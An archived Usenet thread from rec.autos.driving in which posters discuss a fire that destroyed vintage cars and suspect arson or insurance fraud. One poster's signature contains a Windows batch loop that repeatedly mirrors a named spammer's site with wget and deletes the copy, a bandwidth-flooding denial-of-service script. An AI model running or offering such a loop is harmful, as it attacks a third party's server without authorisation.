A sad day. Fire destroys vintage cars

Old April 11th 07, 01:33 AM posted to rec.autos.driving
DYM

Default A sad day. Fire destroys vintage cars

Fire destroys vintage cars

http://www.phillyburbs.com/pb-dyn/ne...7-1327853.html

Note that this isn't the first time this place has burned. There was a
picture in the printed edition that clearly showed three of the cars
destroyed.

Doug
Old April 11th 07, 02:07 AM posted to rec.autos.driving
necromancer

Ladies and Gentlemen (and I use those words loosely), in a sure sign
that the Apocalypse is upon us, DYM said this in rec.autos.driving:
> Fire destroys vintage cars
>
> http://www.phillyburbs.com/pb-dyn/ne...7-1327853.html
>
> Note that this isn't the first time this place has burned. There was a
> picture in the printed edition that clearly showed three of the cars
> destroyed.

Damn, that sucks. Why - o - why can't these fires find a lot full of
beaters inestead of vintage iron like the cars in the story??

--
"I didn't want to hurt them, I only wanted to kill them."
- David Berkowitz
Old April 11th 07, 01:25 PM posted to rec.autos.driving
Mike T.[_2_]

"necromancer" > wrote in message
th.net...
> Ladies and Gentlemen (and I use those words loosely), in a sure sign
> that the Apocalypse is upon us, DYM said this in rec.autos.driving:
>> Fire destroys vintage cars
>>
>> http://www.phillyburbs.com/pb-dyn/ne...7-1327853.html
>>
>> Note that this isn't the first time this place has burned. There was a
>> picture in the printed edition that clearly showed three of the cars
>> destroyed.

> Damn, that sucks. Why - o - why can't these fires find a lot full of
> beaters inestead of vintage iron like the cars in the story??

A better question is, 3 fires in 2 years on the same property, and the fire
marshall is not suspicious? -Dave

Old April 11th 07, 10:32 PM posted to rec.autos.driving
necromancer

that the Apocalypse is upon us, Mike T. said this in rec.autos.driving:

> "necromancer" > wrote in message
> th.net...
> > Ladies and Gentlemen (and I use those words loosely), in a sure sign
> > that the Apocalypse is upon us, DYM said this in rec.autos.driving:
> >> Fire destroys vintage cars
> >>
> >> http://www.phillyburbs.com/pb-dyn/ne...7-1327853.html
> >>
> >> Note that this isn't the first time this place has burned. There was a
> >> picture in the printed edition that clearly showed three of the cars
> >> destroyed.

> > Damn, that sucks. Why - o - why can't these fires find a lot full of
> > beaters inestead of vintage iron like the cars in the story??

> A better question is, 3 fires in 2 years on the same property, and the fire
> marshall is not suspicious?

Good point. Does seem to be a bit of an abberation at that....

--
necromancer

Deadly Psychopath. And Proud of it, Man!!
Old April 11th 07, 11:48 PM posted to rec.autos.driving
Nate Nagel[_2_]

necromancer wrote:
> Ladies and Gentlemen (and I use those words loosely), in a sure sign
> that the Apocalypse is upon us, Mike T. said this in rec.autos.driving:
>
>>"necromancer" > wrote in message
outh.net...

>>>Ladies and Gentlemen (and I use those words loosely), in a sure sign

>>>Damn, that sucks. Why - o - why can't these fires find a lot full of
>>>beaters inestead of vintage iron like the cars in the story??

>>A better question is, 3 fires in 2 years on the same property, and the fire
>>marshall is not suspicious?

> Good point. Does seem to be a bit of an abberation at that....

My old '56 Golden Hawk was eventually sold to a guy in England, who
promptly put it into a restoration shop in Bristol. It was in the
middle of a frame-off resto when the fireworks warehouse next door exploded.

I couldn't make this stuff up if I tried.

nate

(moment of silence, please)

--
replace "roosters" with "cox" to reply.
http://members.cox.net/njnagel
Old April 12th 07, 12:02 AM posted to rec.autos.driving
Jim Yanik

Nate Nagel > wrote in
:

> necromancer wrote:
>> Ladies and Gentlemen (and I use those words loosely), in a sure sign
>> that the Apocalypse is upon us, Mike T. said this in
>> rec.autos.driving:
>>
>>>"necromancer" > wrote in
>>>message th.net...

Or why they didn't get a sprinkler system installed?
the shop was probably not a well-kept one,thus the two fires.

>>>A better question is, 3 fires in 2 years on the same property, and
>>>the fire marshall is not suspicious?

>> Good point. Does seem to be a bit of an abberation at that....
>>

> My old '56 Golden Hawk was eventually sold to a guy in England, who
> promptly put it into a restoration shop in Bristol. It was in the
> middle of a frame-off resto when the fireworks warehouse next door
> exploded.
>
> I couldn't make this stuff up if I tried.
>
> nate
>
> (moment of silence, please)

I guess their zoning laws need rework,too.

--
Jim Yanik
jyanik
Old April 12th 07, 12:20 AM posted to rec.autos.driving
Drunken Driver

necromancer wrote:

>> A better question is, 3 fires in 2 years on the same property, and the fire
>> marshall is not suspicious?

>Good point. Does seem to be a bit of an abberation at that....

There's a textile warehouse down the street that's burned to the
ground 4 times in the last 20 years. Each time it's rebuilt, it's
rebuilt about twice as large as it was before the fire.

--

Ask me about drunk driving for fun and profit!

A nice .CMD for the group's spammers, for the broadband based regulars (requires wget):

:loop
@wget -m http://fat-pussy.aileenkeith.com/
@rd /s /q fat-pussy.aileenkeith.com
goto loop
Old April 12th 07, 12:49 AM posted to rec.autos.driving
DYM

Jim Yanik > wrote in news:Xns990FC1DA4878jyanikkuanet@
64.209.0.86:

> Nate Nagel > wrote in
> :
>
>> necromancer wrote:
>>> Ladies and Gentlemen (and I use those words loosely), in a sure sign
>>> that the Apocalypse is upon us, Mike T. said this in
>>> rec.autos.driving:

> Or why they didn't get a sprinkler system installed?
> the shop was probably not a well-kept one,thus the two fires.

The 'Shop' was a shed that at one time probably held livestock.

>>> Good point. Does seem to be a bit of an abberation at that....
>>>

>> My old '56 Golden Hawk was eventually sold to a guy in England, who
>> promptly put it into a restoration shop in Bristol. It was in the
>> middle of a frame-off resto when the fireworks warehouse next door
>> exploded.
>>
>> I couldn't make this stuff up if I tried.
>>
>> nate
>>
>> (moment of silence, please)
>>

> I guess their zoning laws need rework,too.

Hey zoning laws work real good around here. You can have just about any
useage. You just need to provide enough parking.

Doug
Old April 12th 07, 12:54 AM posted to rec.autos.driving
DYM

Drunken Driver > wrote in
:

> necromancer wrote:
>>>
>>> A better question is, 3 fires in 2 years on the same property, and
>>> the fire marshall is not suspicious?

>>Good point. Does seem to be a bit of an abberation at that....

> There's a textile warehouse down the street that's burned to the
> ground 4 times in the last 20 years. Each time it's rebuilt, it's
> rebuilt about twice as large as it was before the fire.

Drifting further...

Last Summer my daughter had a semester in Japan. She brought back some
interesting pictures. One was of a temple from above. At each end of the
roof was a schulpture of a fish, to protect the temple from fire. That
temple had been destroyed by fire 4 times and rebuilt each time. Guess
the fish didn't work too good.

Anyway 3 fires in two years. It makes me wonder if the cars were in as
good a shape as insured for. I'll look to followups in the future.

Doug
Old April 12th 07, 06:07 PM posted to rec.autos.driving
Eeyore

Jim Yanik wrote:

> Nate Nagel > wrote
> >
> > My old '56 Golden Hawk was eventually sold to a guy in England, who
> > promptly put it into a restoration shop in Bristol. It was in the
> > middle of a frame-off resto when the fireworks warehouse next door
> > exploded.
> >
> > I couldn't make this stuff up if I tried.
> >
> > nate
> >
> > (moment of silence, please)

> I guess their zoning laws need rework,too.

Existing use no doubt. Don't forget that jthe Industrial Revolution started
here.

Graham